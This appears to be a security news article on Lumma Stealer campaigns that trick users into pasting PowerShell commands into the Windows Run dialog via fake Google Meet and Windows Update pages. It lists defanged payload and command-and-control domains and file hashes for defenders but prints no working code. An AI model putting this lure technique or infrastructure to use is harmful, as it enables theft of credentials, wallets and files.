Cyber Security News

Lumma Stealer Using Fake Google Meet & Windows Update Sites to Launch “Click Fix” Style Attack

Cybersecurity researchers continue to track sophisticated “Click Fix” style distribution campaigns that deliver the notorious Lumma Stealer malware to unsuspecting victims.

These increasingly sophisticated tactics, initially documented by Unit42 researchers Billy Melicher and Nabeel Mohamed, utilize social engineering techniques that trick users into executing malicious PowerShell scripts, ultimately leading to the deployment of this dangerous information-stealing malware.

Lumma Stealer

Lumma Stealer, also known as LummaC2 Stealer, is a potent information-stealing malware operating under a Malware-as-a-Service (MaaS) model that has been available on Russian-speaking underground forums since at least August 2022.

Developed by a threat actor using the aliases “Shamel” and “Lumma,” this sophisticated C-language malware targets an extensive range of sensitive data on compromised systems, including cryptocurrency wallets, web browser information, email credentials, financial data, and sensitive files.

The malware has shown remarkable adaptability, with recent versions implementing the ChaCha20 cipher for configuration decryption, demonstrating the developers’ commitment to evading analysis tools and detection mechanisms.

The “Click Fix” distribution method represents a particularly insidious social engineering technique first documented in 2024.

This method creates web pages that covertly insert malicious code into the victim’s clipboard when they interact with seemingly legitimate verification interfaces.

The technique stands out for its psychological manipulation: rather than relying on traditional malicious downloads, it instructs users themselves to paste preloaded malicious code into their Run prompt (accessed via Windows+R), essentially tricking victims into self-infection.

Evolving “Click Fix” Distribution Tactics

According to the Cyber Security News technical analysis, This approach involves web pages that insert scripts into the clipboard, prompting users to paste them into the Run dialog.

For instance, a Fake Google Meet Page hosted on Google Sites instructed users to verify their accounts by executing a PowerShell command.

This command retrieved a script from “tlgrm-redirect[.]icu/1.txt,” initiating a complex infection chain.

Another campaign involved a Fake Windows Update Site at “windows-update[.]site,” where users were prompted to execute a PowerShell command that retrieved a malicious payload from “overcoatpassably[.]shop.”

From a technical analysis perspective, recent campaigns have involved specific malicious files.

 These include a PowerShell script (SHA256: 909ed8a1351f9a21ebdd5d8efb4147145f12d5d24225dbd44cd2800a1f94a596) and a zip archive (SHA256: 0608775a345c5a0869418ffddd1f694cb888fe8acde6d34543516db1a01e3ef8) containing Lumma Stealer components.

This approach allows attackers to bypass corporate firewalls and maintain a false sense of security for potential victims.

Victims are tricked into executing PowerShell commands that download and execute payloads. These scripts often involve base64-encoded data, making them difficult to detect without specific monitoring tools.

Attackers use zip archives containing decoy files and legitimate executables to side-load malicious DLLs.

This technique provides excellent camouflage, as the process appears legitimate while the malicious activity occurs through the side-loaded DLL.

The malware communicates with command and control (C2) domains, including “web-security3[.]com,” “codxefusion[.]top,” “techspherxe[.]top,” and “farmingtzricks[.]top.”

These domains play a crucial role in the malware’s operation, facilitating data exfiltration and command execution.

The evolving tactics of Lumma Stealer highlight the ongoing challenge of defending against sophisticated malware campaigns.

By combining social engineering with technical evasion techniques, attackers continue to successfully bypass traditional security controls.

Organizations must maintain awareness of these emerging tactics and adapt their defensive strategies accordingly to mitigate the risks associated with Lumma Stealer.

Find this News Interesting! Follow us on Google NewsLinkedIn, and X to Get Instant Updates!

Kaaviya

Kaaviya is a Security Editor and fellow reporter with Cyber Security News. She is covering various cyber security incidents happening in the Cyber Space.

Recent Posts

Threat Actors Use Fake DocuSign Notifications to Steal Corporate Data

DocuSign has emerged as a cornerstone for over 1.6 million customers worldwide, including 95% of…

15 hours ago

Government Calls on Organizations to Adopt SIEM and SOAR Solutions

In a landmark initiative, international cybersecurity agencies have released a comprehensive series of publications to…

16 hours ago

WordPress TI WooCommerce Wishlist Plugin Flaw Puts Over 100,000 Websites at Risk of Cyberattack

A severe security flaw has been identified in the TI WooCommerce Wishlist plugin, a widely…

16 hours ago

Microsoft Alerts on Void Blizzard Hackers Targeting Telecommunications and IT Sectors

Microsoft Threat Intelligence Center (MSTIC) has issued a critical warning about a cluster of global…

16 hours ago

Hackers Use Fake OneNote Login to Capture Office365 and Outlook Credentials

A recent investigation by security analysts has uncovered a persistent phishing campaign targeting Italian and…

17 hours ago

Hackers Exploit Craft CMS Vulnerability to Inject Cryptocurrency Miner Malware

Threat actors have exploited a critical Remote Code Execution (RCE) vulnerability, identified as CVE-2025-32432, in…

17 hours ago